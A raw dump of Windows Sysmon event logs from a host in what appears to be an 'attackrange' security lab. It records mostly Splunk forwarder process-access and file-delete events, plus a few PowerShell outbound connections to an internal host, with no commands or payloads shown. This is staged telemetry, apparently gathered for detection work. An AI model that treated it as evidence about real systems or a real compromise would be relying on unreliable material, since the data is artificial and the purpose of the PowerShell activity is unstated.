Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.617{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036497293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.933{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50516-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036497292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.580{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16ED206AFE22E4839D78E595E4077475,SHA256=CC30D56EF074CCCA996ADD572788652816D4F069375AFA48C596EA2D2D831D28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=01972CDA8360AF4C4CC922F774B6A8DE,SHA256=F00C98FBD853A8348996100CCB0CEC5E87824F3A03AA462AC89A1CFEEB36467D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.064{B81B27B7-A0B5-6140-7C56-04000000C801}62086824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80CF441F253DA009ACCAE231B6FABA7A,SHA256=497C9EA9C57108300FA641EB3C3628197837CC056CCA8561FA66F210B36BE7C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.312{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.312{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.295{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.280{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:40.612{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A84B7A5B7E1CE8BA13C49E2AFABA2F46,SHA256=14E2305F812600C3007ACAEA224F1A67AEA71374B2F318C65B20715C94950B8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:40.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CD1DC7C7903F7BD1B9EE90A45EDC1E5,SHA256=2B6C4505EE26AF26FC9E38ED582D897E8F0C992A52D16C642038E4497FB513E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:10.831{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50517-false10.0.1.12-8000- 23542300x800000000000000036497309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:41.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7229601227E04488FA2AEC13314EBA48,SHA256=157FF4E0997A4AF682ABAA8A76BFAD6DECD5DD412696CFF9DC1039E7F58E17E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:42.645{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C32B84DEEEA5C8475BA63C072B83B1,SHA256=A1A2F84E49A4D0B8B47D65414DAE601256883F01AFAF6050323F5225B5704349,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:43.660{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A9AA0C77C42EEE251150A3E8DF70DBF,SHA256=EF08FA437F4984B2044F8C7D0F96E52D84958146F448458983E2254667BBB05D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:14.944{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50518-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:44.675{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3862601FEB6DC538C47B4522CDE65D4F,SHA256=C730E413D0A163674D0B47531D2A822F3E482E33DBD46C2F4E64958E8D850304,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:44.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D993B719AAC786BEF8B0FAEE85B34F99,SHA256=E7EEB8159CA21C4DEF6A0F17017640487D356730573F53F8082CE7688C5512DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:15.842{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50519-false10.0.1.12-8000- 23542300x800000000000000036497316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:45.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C90D7EE7713260329EB83355DF5AE390,SHA256=3F8BD787D53BD51B35473454BBBC848C36FF2DDB26AAE96F18E86484AAF4B539,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:46.773{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEC3A980C65BE8CF677A0F1120A82B8,SHA256=B2424B373844080784DF5068B7028654985FF88FE816C9E647BEEA2B74B0D128,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:47.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82A199663399C960D3ED0505FCAA803,SHA256=6D29EC7F54AF777CBF663407FD729D5BD0E96B45B413C52034560BA5D87350B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:48.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1313674D989530055B34C07823E9B3A,SHA256=10EEE41C2541AD2F1DF491A57B1048E2FF10E39A9BD5FF418E58C55449D40101,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:49.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EF1DFAE4FC68912F69C3481B258C1B,SHA256=002EB1DA110C413D858C9B46F56CB7EE20C28CF76F60DB4C4C24C3DCF5DA6F44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:49.354{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E2954807896EA54E97DB946E2ABA7272,SHA256=9CD7ECAEE8EEABAC217CD55EC6ABB91FA74BBD315449270E0512D9D18EF05638,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 